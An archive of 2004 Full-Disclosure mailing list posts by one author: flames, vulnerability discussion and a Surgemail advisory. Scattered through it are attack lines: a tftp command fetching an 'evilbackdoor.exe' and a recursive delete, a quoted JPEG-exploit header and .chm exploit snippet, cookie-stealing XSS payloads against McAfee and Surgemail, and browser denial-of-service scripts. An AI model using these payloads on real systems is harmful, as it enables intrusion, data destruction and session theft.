( whether you are a person or business enity 
 and many successfull business have no internet presence )
if i am correct... being on the the internet is not manditory to
conduct life sustaining activities...
( eat, shit, sleep [ pay bills to sustain the aforementioned activities ] )
and, correct me if i am wrong... i cannot harm you via the internet

hint: get off the internet and stop bitching 
( and no, you cannot sue and litigate )


my 2 bits,

m.wood 

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


Re: [Full-Disclosure] XP Remote Desktop Remote Activation

2004-10-02 Thread morning_wood
 a malicious user who has already gained a command shell to activate

umm... you already own the box.
try... 
tftp -i yourhost get evilbackdoor.exe ( vnc mabey )

or

c:\del *.exe /s
c:\shutdown -r

I realy do not see the SECURITY ISSUE here.


cheers,
m.wood

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


Re: [Full-Disclosure] MS04-028 Jpeg EXPLOIT with Reverse and Bind shell ...

2004-09-25 Thread morning_wood
umm, no
all this has thats different is correct headers for bind or remote shell
option.
and ability to set ports and return ip in the code, instead of needing to
use your own shellcode ( or metasploits ) note: there is no new exploit code
or vector

--- / snip /-
new.
char header1[] =
\xFF\xD8\xFF\xE0\x00\x10\x4A\x46\x49\x46\x00\x01\x02\x00\x00\x64
\x00\x64\x00\x00\xFF\xEC\x00\x11\x44\x75\x63\x6B\x79\x00\x01\x00
\x04\x00\x00\x00\x0A\x00\x00\xFF\xEE\x00\x0E\x41\x64\x6F\x62\x65
\x00\x64\xC0\x00\x00\x00\x01\xFF\xFE\x00\x01\x00\x14\x10\x10\x19
\x12\x19\x27\x17\x17\x27\x32\xEB\x0F\x26\x32\xDC\xB1\xE7\x70\x26
\x2E\x3E\x35\x35\x35\x35\x35\x3E;
--- / snip /-
old.
--- / snip /-
char header1[]=
\xFF\xD8\xFF\xE0\x00\x10\x4A\x46\x49\x46\x00\x01\x02\x00\x00\x64
\x00\x64\x00\x00\xFF\xEC\x00\x11\x44\x75\x63\x6B\x79\x00\x01\x00
\x04\x00\x00\x00\x0A\x00\x00\xFF\xEE\x00\x0E\x41\x64\x6F\x62\x65
\x00\x64\xC0\x00\x00\x00\x01\xFF\xFE\x00\x01\x00\x14\x10\x10\x19
\x12\x19\x27\x17\x17\x27\x32\xEB\x0F\x26\x32\xDC\xB1\xE7\x70\x26
\x2E\x3E\x35\x35\x35\x35\x35\x3E;
--- / snip /-

take your media hype and die kthnx,
m.wood


 the last step before the worm

 http://www.k-otik.com/exploits/09252004.JpegOfDeath.c.php

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


Re: [Full-Disclosure] Scandal: IT Security firm hires the author of Sasser worm

2004-09-22 Thread morning_wood
Ron, PLEASE STFU KTHNX ( you too Larry S. )

Who the f*ck cares, they hired him, if you dont like the company, dont
patronize them for business.
But please shutthefuckup. Why?
1. You have nothing to contribute.
2. you bitch and moan about things that are truly insignifigant.
3. you are a Media Whore(s)
4. please see items 1-3

note: Item 4 is also applicable to Nick F. and Valdis K.

m.wood

 ahh, yes, but trust is a major component of this  business.  would you
 hire the person that sole all your valuables from your home to guard it
 for you?  would you really trust them if you were ignorant enough to do
 so?

 Thanks,

 Ron DuFresne

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


Re: [Full-Disclosure] New GDI exploit

2004-09-22 Thread morning_wood
reverse successfull...

m.wood

 Game over...
 
 So the exploit is out that will open a local command prompt on the
 machine exploiting the GDI library..
 
 This thing allows 2500 bytes of shellcode..
 
 How long before this turns nasty?
 
 Seems easy to me to make it reverse shell...
 
 
 
 
 The problem I have is patching with SMS. MBSA won't pickup the needed
 patched in SMS so you have to push out to all machines in a container
 for a certain software type-
 
 IE
 XP
 VIsio
 
 
 blah blah so on
 
 
 
 The cycle continues..
 
 JP
 
 ___
 Full-Disclosure - We believe in it.
 Charter: http://lists.netsys.com/full-disclosure-charter.html
 

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


Re: [Full-Disclosure] Scandal: IT Security firm hires the author of Sasser worm

2004-09-20 Thread morning_wood
guess they shouldnt have publicized it. ( who cares )

@stake / Symantec - business is business, Symantec is aquiring not only
tools and expertise,
 but possibly more importantly a broader, richer client base. ( again, who
cares )

I do however find this interesting... the below suggests that a persons
and or persons affilliated
with a TROJAN coding history ( and a bad one at that ) is now ( or has
been ) working
with / for GFI.

look here:
http://s93625203.onlinehome.us/news.php

we will see you on sub7.net...
in the not so distant future,
 for new tools...
in the mean time visit www.forcedcontrol.com
and www.gfi.com for blades LanGuard

fc.com  ( trojan ddos kiddie :ed) and its crew have finished to move onto
other
 professional projects. bla bla

conclusion:
blade ( a former? virus / trojan coder ) works for and is / was a major
player for GFI.
and now ( blade / GFI ) is possibly now recruting other known viri / trojan
coders?

research:
http://www.google.com/search?hl=enie=UTF-8newwindow=1safe=offq=blade+Languardspell=1

www.come.to/soul4blade   GFI

http://www.google.com/search?q=soul4bladebtnG=Searchhl=enlr=ie=UTF-8newwindow=1safe=off

http://www3.ca.com/securityadvisor/virusinfo/virus.aspx?ID=3282
Removal of the file and/or the registry entry will disable Blade Runner.
For further information on Blade Runner please see
http://www.come.to/soul4blade (link valid 29/03/00). 



nuff said,
m.wood

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


Re: [Full-Disclosure] [PoC] Nasty bug(s) found in Axis Network Camera/Video Servers

2004-08-25 Thread morning_wood
password issues known to exist..

http://www.google.com/search?hl=enlr=ie=UTF-8newwindow=1safe=offq=axis+camera+exploit

http://www.google.com/search?hl=enlr=ie=UTF-8newwindow=1safe=offq=axis+camera+vulnerability

or...
http://www2.corest.com/common/showdoc.php?idx=329idxseccion=10
http://www.securityfocus.com/bid/3640/exploit/

To: [EMAIL PROTECTED]
Date: Mon, 16 Aug 2004 22:48:38 +0200 (CEST)

try the contact page?
http://www.axis.com/corporate/contact.htm



err...

m.w

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


Re: [Full-Disclosure] new email virus?

2004-08-25 Thread morning_wood
object  data=http://www.v%69k%6F%72d.com/default.htm;brbr

this is a data tag .chm exploit


[textarea id=code style=display:none;]
[object
data=#109;s-its:%6D%68%74%6D%6C:file://C:\drqwtt.mht!${PATH}/default.chm::
/default.htm type=text/x-scriptlet][/object]
[/textarea]

[script language=javascript]

document.write(code.value.replace(/\${PATH}/g,location.href.substring(0,loca
tion.href.indexOf('default.htm';
[/script]


m.wood

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


Re: [Full-Disclosure] [PoC] Nasty bug(s) found in Axis Network Camera/Video Servers

2004-08-22 Thread morning_wood
password issues known to exist..

http://www.google.com/search?hl=enlr=ie=UTF-8newwindow=1safe=offq=axis+camera+exploit

http://www.google.com/search?hl=enlr=ie=UTF-8newwindow=1safe=offq=axis+camera+vulnerability

or...
http://www2.corest.com/common/showdoc.php?idx=329idxseccion=10
http://www.securityfocus.com/bid/3640/exploit/

To: [EMAIL PROTECTED]
Date: Mon, 16 Aug 2004 22:48:38 +0200 (CEST)

try the contact page?
http://www.axis.com/corporate/contact.htm



err...

m.w

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


Re: [Full-Disclosure] ws_ftp.log

2004-08-15 Thread morning_wood
your serious??
this issue has been arround for about 10 years...
try googling ws_ftp.ini where you can simply drop the
ini in your ws_ftp folder, convert the hashes or import into your
favorite ftp client that supports ws_ftp.ini style format.


m.wood

- Original Message - 
From: Gaurang Pandya [EMAIL PROTECTED]
To: [EMAIL PROTECTED]
Sent: Sunday, August 15, 2004 5:19 AM
Subject: [Full-Disclosure] ws_ftp.log


 Hi,
 
 WS_FTP is a popular  feature rich ftp client. It
 makes upload/download as easy as drag  drop. But
 mostly peoples using this forget that it creates a log
 file with name ws_ftp.log. This file holds sensitive
 data such as file source/destination and file name,
 date/time of upload etc., People when use this to
 upload files to their website, never know that along
 with other files even ws_ftp.log file also gets
 uploaded to the webserver, making it globally
 accessible.
 

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


Re: [Full-Disclosure] Re: Automated SSH login attempts?

2004-07-30 Thread morning_wood
 wgte frauder.us/linux/ssh.tgz
http://frauder.us serves up putty.exe ( v 0.54 ) on connect
as frauder, no extension. Proally not your average admin
tool setup...

m.wood

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


Re: [Full-Disclosure] IE

2004-07-17 Thread morning_wood
i am qurious if a regedit setting exist in order to alter the user agent of
the browser
and to conseal info.

under windows...

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet
Settings\User Agent\Post Platform

use anything... ( including javascript [hinthint] )


m.wood

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


Re: AW: [Full-Disclosure] Firefox 0.92 DoS via TinyBMP

2004-07-13 Thread morning_wood
it seems to just be loading a bunch of data ( 1851MB ) via images
to consume memory.

the same effect can be accomplished here...

http://msdn.microsoft.com/library/default.asp?url=/library/en-us/dninstj/html/privacyforbrowserusers.asp

-- snip --
Such memory protection systems aren't foolproof. Even for normal memory and
non-ActiveX controls, this script fragment will bring most browsers quickly
to their knees (don't try this unless you're willing to re-boot):

HTMLBODYSCRIPT
var big_string = double me up!;

while (true)
{
big_string = big_string + big_string;   // 20 iterations equals all your
memory...
}
/SCRIPT/BODY/HTML

-- snip --

or not



m.wood

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


Re: [Full-Disclosure] Erasing a hard disk easily

2004-07-12 Thread morning_wood

 Since that time I have seen sensationalist TV shows showing how FBI and
CIA
 operatives get stuff out written to a sector BEFORE the sector was
 overwritten and I honestly cannot understand how that could be, if at all
 possible. Am I right in thinking those shows are bull?

simple...

by analizing the magnetics of the disk 
one write makes 010101 etc
the 0's and 1's are written to the disk by a magnetic manipulation to the
disk
there is a level of magnetisim than can be measured
the disk electronics detect this difference.
lets say a 0 can be between .000 and .010 and a 1 is between .996 and
1.00

when you write again over the data, the magnetic properties of the disk
rember slightly the previous write.

now when you analize the disk there is a ghosting of the previous data
example...
new data pits 0 =.009 1=.999
( ghost pits )  0=.003 1=.997

the drive electronics will detect the higher magnetic pits as actual data
and discard
the data below the new threshold.

recovering the ghost data is now trivial by setting the thresholds below
the new data levels..
logic: discard any data over .004 for 0 and .996 for 1s


this is a very basic example of course but shows how this technique is used.


Donnie Werner

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


Re: [Full-Disclosure] Re:

2004-06-23 Thread morning_wood
http://exploit.wox.org/babelpr0x.html
try babelfish?

m.wood

  http://exploit.wox.org/tools/googleproxy.html
 
 But with that (it is only the google translator), you aren't anonymous, 
 because the images and other files aren't translated, and they are loaded 
 directly from the server.

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


Re: [Full-Disclosure] IFH-ADV-31337 File Source disclosure vulnerability in all web servers.

2004-06-16 Thread morning_wood
rofl, are you sure your not Bipin ?


Subject: [Full-Disclosure] IFH-ADV-31337 File Source disclosure vulnerability
in all web servers.

 File Source disclosure vulnerability in all web servers.
 Remote explotation of this issue can be achived by clicking with the
 right button into the website and selecting the view source code option.
 This option will display the contents of the html code.

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


[Full-Disclosure] Surgemail - Multiple Vulnerabilities

2004-06-03 Thread morning_wood

   - EXPL-A-2004-002 exploitlabs.com Advisory 028 -

- Surgemail -



OVERVIEW

SurgeMail is a next generation Mail Server -
Combining features, performance and ease of
use into a single integrated product.
Ideal on Windows NT/2K, or Unix (Linux, Solaris etc)
 and supports all all the standard protocols
IMAP, POP3, SMTP, SSL, ESMTP.

Surgmail suffers from two basic remote vulnerabilities...

1. Information Disclosure, by providing a non existant filename, the STDERR
is rendered to the user, disclosing physical directory structure.

2. XSS ( cross site scripting ) via the login form, and in particular
the username field. This allows for credential theft via externaly
hosted malicous script. This affects both HTTP and HTTPS access vectors.



AFFECTED PRODUCTS
=
Surgemail ( Win32 and *nix through versions 1.9 )

WebMail v3.1d Copyright © NetWin Ltd

http://netwinsite.com/index.html
http://netwinsite.com/overviews.htm
http://netwinsite.com/server/email_server_software.htm


DETAILS
===
1. Information Disclosure
Surge mail's web based interface reveals physical
directory structure by requesting a non-existant
(404) request.


http://x.x.x.x/[non-existant request]

http://x.x.x.x:7080/scripts/
Could not create process D:\surgemail/scripts/ Access Denied
Is the url correct, check for a log file in the scripts directory
 and run the process in a shell window (D:\surgemail)

http://x.x.x.x:7080/scripts/err.txt
Could not create process D:\surgemail/scripts/err.txt File Not Found
Is the url correct, check for a log file in the scripts directory
 and run the process in a shell window (D:\surgemail)

http://x.x.x.x/scripts/err.txt
CGI did not respond correctly, it probably exited abnormally or the file
may not exist or have +x access (/usr/local/surgemail/scripts) (err.txt) ()



2. XSS ( cross site scripting )

 The login form username field is vunerable to XSS

 snip 

http://x.x.x.x:7080/
http://x.x.x.x:7080/scriptalert('Vulnerable')/script
http://x.x.x.x:7080/scriptalert(document.cookie)/script

 snip 



SOLUTION

Vendor contacted May 16, 2003 [EMAIL PROTECTED]
Vendor acknowlegement recieved May 17, 2003

Vendor Patch / Version 2.0c released June 2, 2004
and may be obtained at
ftp://ftp.netwinsite.com/pub/surgemail/beta
http://www.netwinsite.com/surgemail/help/updates.htm


PROOF OF CONCEPT

( see DETAILS )


CREDITS
===
This vulnerability was discovered and researched by

Donnie Werner of exploitlabs
mail: [EMAIL PROTECTED]
--
web: http://exploitlabs.com
web: http://zone-h.org

ref: http://zone-h.org/en/advisories/read/id=4714/
ref: http://exploitlabs.com/files/advisories/EXPL-A-2004-002-surgmail.txt

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


Re: [Full-Disclosure] Beware of 'IBM laptop order' email

2004-06-01 Thread morning_wood
http://www.f-secure.com/v-descs/wallon.shtml


 Last week on the site of 'The Register' an article was published about 
 spam-mail that used an unknown 'zero-day' vulnerability in IE. They did not 
 release any information about the zero-day issue, so perhaps anyone on the 
 list knows anything about this issue and whether or not this issue is really 
 a zero-day vulnerability or just a old one,
 
 The article can be found at the following URL:
 http://www.theregister.co.uk/2004/05/24/fake_order_viral_scam/
 

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


Re: [Full-Disclosure] Vendor casual towards vulnerability found in product

2004-05-26 Thread morning_wood
 I have the following queries

 1. Would an exploit like this be said to be severe?

yes

 2. Is the vendor right in their approach to this issue?

not entirely

 3. How do I make public the vulnerability? (Vendor has given permission for
 the same)

post it here, on your site, or another security list

 4. Ok, I'll rather ask... *should* I make public details of this
 vulnerability? (Since I know of sites using this app server, and they may be
 taken down if the exploit goes out)

yes, mabey the vendor will wake up


that said, It seems the vendor knows of the flaw, and is easily remedied by the
aforementioned
non default setting and documentation reflecting that it is a good thing to
enable said option.
 Often a disclosure policy helps vendors stay on track

some disclosure policys can be found at..

http://oisafety.org/
http://oisafety.org/process.html

http://exploitlabs.com/disclosure-policy.html
http://www.cert.org/kb/vul_disclosure.html
http://www.atstake.com/research/policy/
http://www.hut.fi/~tianyuan/slides/template/template.html


Donnie Werner
http://exploitlabs.com











___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


[Full-Disclosure] Microsoft Defaced ( again )

2004-05-24 Thread morning_wood
Zone-h.org reports..

A Portuguese group dubbed Outlaw group has defaced the Microsoft.com web
site, the hacked page (www.microsoft.com/mspress/uk/) isn't available anymore
since 9:00pm GMT

read more...
http://zone-h.org/en/news/read/id=4251/


m.wood

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


Re: [Full-Disclosure] ActivePerl Perl2Exe [was] Buffer Overflow in ActivePerl ?

2004-05-21 Thread morning_wood
further testing...

c:\type test1.pl
#test1.pl
$a=A x 256; system($a);

http://[host]/test1.pl
[host - output ]
The instruction at 0x28073f63 referenced memory at 0x01c42ce0.
The memory could not be read

c:\type test2.pl
#test2.pl
$a=A x 261; system($a);

http://[host]/test2.pl
[host - output ]
The instruction at 0x28073f63 referenced memory at 0x42c42ce0.
The memory could not be read

Donnie Werner
http://exploitlabs.com


- Original Message -
From: Stephen Blass [EMAIL PROTECTED]
To: [EMAIL PROTECTED]
Sent: Thursday, May 20, 2004 2:15 PM
Subject: RE: [Full-Disclosure] ActivePerl Perl2Exe [was] Buffer Overflow in
ActivePerl ?


 Perl2Exe rolls the interpreter up into the exe so if the interpreter is
vulnerable, then the exe will be too.  With the service compiler you will have
the same situation in services compiled as 'standalone'; if you compile
'dependent' services you are at the mercy of the perl interpreter on the system
you deploy the service on.

 You can change the behavior of the perl 'system' in a perl script like so.

 use subs qw (system);
 sub system { my ($cmd)[EMAIL PROTECTED]; printwhat, me run $cmd ? ; }
 $a=A x 256; system($a);

 You can reach out from your custom system subroutine to the real thing if
you'd like by calling CORE::system if you want to scrub arguments some more
before passing them to the system.

 -
 Steve Blass




 -Original Message-
 From: [EMAIL PROTECTED]
 [mailto:[EMAIL PROTECTED] Behalf Of Clint
 Bodungen
 Sent: Thursday, May 20, 2004 12:44 PM
 To: morning_wood; 0day; [EMAIL PROTECTED]
 Subject: Re: [Full-Disclosure] ActivePerl Perl2Exe [was] Buffer Overflow
 in ActivePerl ?


 I haven't tested it yet but this also probably means that the msi/Microsoft
 service compilor in the Activeperl Developer's Kit is as well then.


 - Original Message -
 From: morning_wood [EMAIL PROTECTED]
 To: 0day [EMAIL PROTECTED]; [EMAIL PROTECTED]
 Sent: Thursday, May 20, 2004 2:08 PM
 Subject: [Full-Disclosure] ActivePerl Perl2Exe [was] Buffer Overflow in
 ActivePerl ?


  binaries created via perl2exe also are affected.
 
  C:\type 1.pl
  #
  $a=A x 256; system($a);
 
  C:\perl2exe -v 1.pl
  Perl2Exe V7.02 Copyright (c) 1997-2003 IndigoSTAR Software
  Cmd = -v 1.pl
  CWD = C:\
  Known platforms: Win32
  Target platform = Win32 5.006001
  $I =
  $ENV{'PERL5LIB'} =
  Found perl.exe at C:\Perl\bin
  LibList = C:\Perl\lib,C:\Perl\site\lib,.
  Converting '1.pl' to 1.exe
  Compiling 1.pl
 
  C:\1.exe
  [BIG CRASH]
 
  C:\
 
 
 
  Donnie Werner
  http://exploitlabs.com

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


[Full-Disclosure] ActivePerl Perl2Exe [was] Buffer Overflow in ActivePerl ?

2004-05-20 Thread morning_wood
binaries created via perl2exe also are affected.

C:\type 1.pl
#
$a=A x 256; system($a);

C:\perl2exe -v 1.pl
Perl2Exe V7.02 Copyright (c) 1997-2003 IndigoSTAR Software
Cmd = -v 1.pl
CWD = C:\
Known platforms: Win32
Target platform = Win32 5.006001
$I =
$ENV{'PERL5LIB'} =
Found perl.exe at C:\Perl\bin
LibList = C:\Perl\lib,C:\Perl\site\lib,.
Converting '1.pl' to 1.exe
Compiling 1.pl

C:\1.exe
[BIG CRASH]

C:\



Donnie Werner
http://exploitlabs.com
 

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


Re: [Full-Disclosure] Re: Buffer Overflow in ActivePerl ?

2004-05-18 Thread morning_wood
and we seem to get control of EIP.  Coincidence?  Try yet two more:
C:\perl -e $a=A x 261; system($a)


C:\perl -V

Characteristics of this binary (from libperl):
  Compile-time options: MULTIPLICITY USE_ITHREADS PERL_IMPLICIT_
LICIT_SYS
  Locally applied patches:
ActivePerl Build 635
  Built under MSWin32
  Compiled at Feb  4 2003 15:34:21
  @INC:
C:/Perl/lib
C:/Perl/site/lib
.
C:\

C:\perl -e $a=A x 261; system($a)
The input line is too long.

[CRASHE HERE]

C:\


___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


Re: [Full-Disclosure] Buffer Overflow in ActivePerl ?

2004-05-17 Thread morning_wood
Can anybody reproduce this?

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\perl -e $a=A x 256; system($a)
'AAA


A' is not recognized as an internal or external command,
operable program or batch file.

[BIG CRASH HERE]

C:\perl -v

This is perl, v5.6.1 built for MSWin32-x86-multi-thread

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


Re: [Full-Disclosure] Sasser author

2004-05-13 Thread morning_wood
 Sasser violates poorly designed/implemented network infrastructures.

kinda like breaking into a room via a locked door, through a window in
said locked door. The door design does not impliment a proper design 
infrastructure for the intended application.

Jail the mfg of the Door?? i think not.

The door is not of suitible design for the intended security application, sure,
but someone did circumvent the security device ( the lock ) via an exploitable
flaw ( the window). Still a clear case of breaking and entering, not to memtion
circumvention of an access device ( the lock in the door ).

my 2bits.

D. Werner

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


Re: [Full-Disclosure] A rather newbie question

2004-05-02 Thread morning_wood

 that sure got their attention! just keep this up but after informing the isp
that if they cannot protect your network then you would have to take active
steps to protect your network which includes all the network scanning and
namapping etc

since when is it the ISP's job to protect your network ,
unless you have an agreement with them that they will be protecting your
network.

m.w

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


Re: Subject: [Full-Disclosure] Some suspicious files

2004-05-01 Thread morning_wood
sneaker

 possibly a beta version of a connect back trojan.

 seems to be able to use a website to transfer information between the
 attacker and the infected machine.


appredir-username=some_irc_guy
client version=sneaker_0.19
cmd-url=http://1337suxx0r.ath.cx:580/hack/sneaker/cmd.php=login-url=http://1337s
uxx0r.ath.cx:580/hack/sneaker/login.php
opfer-info=some_irc_guy
 /s7regkey={13371337-1337-1337-1337-133713371337}
SubSeven Startup Method (requires Config Setting s7regkey)

m.w

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


[Full-Disclosure] McAfee Website XSS

2004-04-30 Thread morning_wood
http://vil.mcafee.com/alphar.asp?char=SCRIPTalert(document.cookie);/SCRIPTS
CRIPTalert(document.cookie);/SCRIPT

D.Werner
http://nothackers.org

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


Re: [Full-Disclosure] viruses being sent to list

2004-04-30 Thread morning_wood
Tamas Feher wrote...
 1., First Amendment defines free speech. Source code has been proven
 free speech. Executables are not covered by free speech

this statement is illogical.
what exactly makes string of characters executable ?

MZ? elf? contained in the first few bytes / bits?
please define exactly WTF you mean here.
you can convert a windows executable to a vbs...is this still an executable?

just because some order of words in a computer file is somehow compiled by a
higher
language interpeter to run naitvly on some processing type of device,
under some operating type computing system that this is automagically
different in some aspect??
please please explain this to me in simple, logical terms.
how about wormwriters only target persons with compilers installed???
then they can just send source code and then its compiled on the target
 ( dont many *nixy viri do exactly this? )
if i renamed a viri.exe to viri.exe.txt, then this is not in executable form,
but yet contains the same information, in the same order of bits.. ..

there is only one difference i see, someone without the ability to produce
native code
from a language source to run on said processing type of system, can't run
said code  VS one who does and can.

are you being serious here???

m.wood



___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


Re: [Full-Disclosure] H9-0001 Advisory: Sphiro HTTPD remote heap overflow (Rosiello Security)

2004-04-30 Thread morning_wood
 Hi morning wood. Aren't you the guy who ran a vulnerable demo version
 of some windows ircd for your security team? Oh no maybe someday
 you might be important enough to be Rosiello Jr Security Analyst.
no, i ran a personal IRCD that was attacked by the by the precursor of msblaster
( proc32.exe ) and it was a DoS to my connection, not a buggy IRCD.
details may be read at
http://exploitlabs.com/attack/RPC-DCOM-DD0S-attack.txt
or
http://lists.virus.org/dw-0day-0308/msg1.html
or
http://www.blacksheepnetworks.com/security/security/fulldisc/5779.html

get you facts straight mmmk

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


[Full-Disclosure] Heads up: Possible lsass worm in the wild

2004-04-29 Thread morning_wood
dropped file: %SYSTEM%/msiwin84.exe
remote process established to: lsass.exe
remote ip:4.x.x.x

note: file msiwin84.was not running


this appears to be a blaster type of worm working on the first and / or
second subset of the infected host to begin scanning for more hosts.
I have not completly unpacked the binary but here is some strings.

-- snip --
DnsFlushResolve
{ache.dapi.dllVQUIT RIVMSG %s : screw you KGGo home  cCmd.Net, +MODEW ]m715
522947
6660M USERHOST/@ JOINFL :YnASSo DCC \ND  o:.bmpJd Error: fixipS enc5n  clos
*+h2(P/ t,O cu.g ACHO=Ds NEU(fkbit/s)  tal!x [EMAIL PROTECTED]'Q_  IP addrvs3

-- snip ---

based on the above, the worm / viri tries to connect to a IRC server.

anyone else experiencing this?


morning_wood
http://exploitlabs.com








___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


Re: [Full-Disclosure] H9-0001 Advisory: Sphiro HTTPD remote heap overflow (Rosiello Security)

2004-04-29 Thread morning_wood
 Unrelated but funny stories of rave (Jonny Mast) getting owned:
 
 - rave gets his account backdoored on kokanin's box. He finds the obviously 
 
 Apr 24 13:25:18 rave  KOKANIN UR BOX IS FUKCING HACKED AND ALL MY 
 STUFF IS GONE!

rofl, DTORS owned again.
hi there kokanin, b0f, htols, bob  lmfao


___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


RE: [Full-Disclosure] Cisco LEAP clueless exploit tool...

2004-04-15 Thread morning_wood
From: [EMAIL PROTECTED]
 ahh nevermind, it's clear neither of you have the
 desire to learn 
mabey they need this...

- snip -
#!/usr/bin/perl
#
# the perl of security ( gettn' a clue )
# by m.wood
#
# version 1.03
#

use CommonSense; # you do have this module... right?
use Logic; # just the facts
require IO::openMind;

print(get a clue\n);

my $awareness=$perspective,$insight;

#give input here
my $newskill=STDIN;

if(defined $clueless) {
 perspective($clueless);
 exit; # die here... your stupid
}

# sub aquire skill 
for $security {
 $perspective(openMind+($awareness));
if($insight-from($newskill));
 }
}
print now you have a clue, kthnx\n;
exit;
- snip --

hope this helps,

m.wood
http://exploitlabs.com 

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


Re: [Full-Disclosure] Which worm?

2004-04-15 Thread morning_wood
 Another question: Is there a quick way to find out which tool compressed 
 an executable? A tool maybe?

PEiD
http://peid.has.it/

m.wood
http://exploitlabs.com 

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


[Full-Disclosure] Browser bugs [DoS] - Do they bite?

2004-04-11 Thread morning_wood
  Browser bugs [DoS] ... where will you draw a line?

 DoS bugs that cause permanent damage are treated differently, of course.
 For example, I could imagine a bug that would corrupt some critical file

what about Browser bugs[DoS] a XSS vunerable site?
simple javascript leveraged against a host that has a XSS issue.
so if you could embed scriptjavascript:location.reload()/script
in a high traffic, XSS'able site, you could cause a denial of service
to the webserver from the users trying to view the site.

http://host/stupidscript?someoption=scriptjavascript:location.reload()/script


will continuily refresh to http://host/stupidscript , since it is XSS'able, the
server
returns the script only to be executed again and again and ( you get the
picture )
could be used legitematly for a net-sit-in to deny a site as well.

see: http://nothackers.org/pipermail/0day/2003-October/000236.html

and exactly why does this produce such an odd result?
http://ws.arin.net/cgi-bin/whois.pl?queryinput=scriptjavascript:location.reloa
d()/script

Search results for:
(N) orwegian Telecommunications Administration (OTA)
(A) sian Development Bank (SDB-1)
USDA - Office of Operations (UOO)
Shipleys Donut Shops


 ( yum! donuts.  but they did fix thier XSS )



m.wood
http://exploitlabs.com

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


Re: [Full-Disclosure] FAT32 input output = null?

2004-04-08 Thread morning_wood
executing this at the dos promt would create a  zero byte m.wood file
 m.wood
looks like a feature equivalent to touch m.wood or touch filename 

LMFAO

m.wood

Delivered using the Free Personal Edition of Mailtraq (www.mailtraq.com)

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


Re: [Full-Disclosure] FAT32 input output = null?

2004-04-07 Thread morning_wood
 [EMAIL PROTECTED]:~$ more testfile.txt
 Let's try this in Linux
 [EMAIL PROTECTED]:~$ ls -al testfile.txt
 - -rw-r--r--1 chrisusers  24 Apr  7 12:43 testfile.txt
 [EMAIL PROTECTED]:~$ testfile.txttestfile.txt
 - -bash: ./testfile.txt: Permission denied
 [EMAIL PROTECTED]:~$ more testfile.txt
 [EMAIL PROTECTED]:~$ ls -al testfile.txt
 - -rw-r--r--1 chrisusers   0 Apr  7 12:44 testfile.txt
 [EMAIL PROTECTED]:~$

anyone try with a executable?
 mabey 
linibox$ pwd
/usr/bin
linibox$ bash bash 



m.wood

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


Re: [Full-Disclosure] FAT32 input output = null?

2004-04-07 Thread morning_wood
 You can also delete files by using the del command. I tested this with the 
 5.1 ntos kernel (Slackware XP):
 
 C:\del testfile.exe

if you were trying to be sarcastic in saying this is
normal, any dummy knows that  then you failed
horrendously, sir.
where did the delete command came from 
this has nothing to do with any system command
it was simply an odd behavior where by  piping
output of a file into itself, causes a 0 byte or corrupted file
C:del.exe del.exe
in particular, executeable files.


m.wood


___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


[Full-Disclosure] FAT32 input output = null?

2004-04-06 Thread morning_wood
Fat32 file output redirect overwrites self.
===

odd behavior... ?

1.) console application output redirected to itself ( file.ext  file.ext )
C:\testprogram.exe program.exe
 program.exe
The process cannot access the file because it is being used by another process.

ok great, normal error ( i thought )
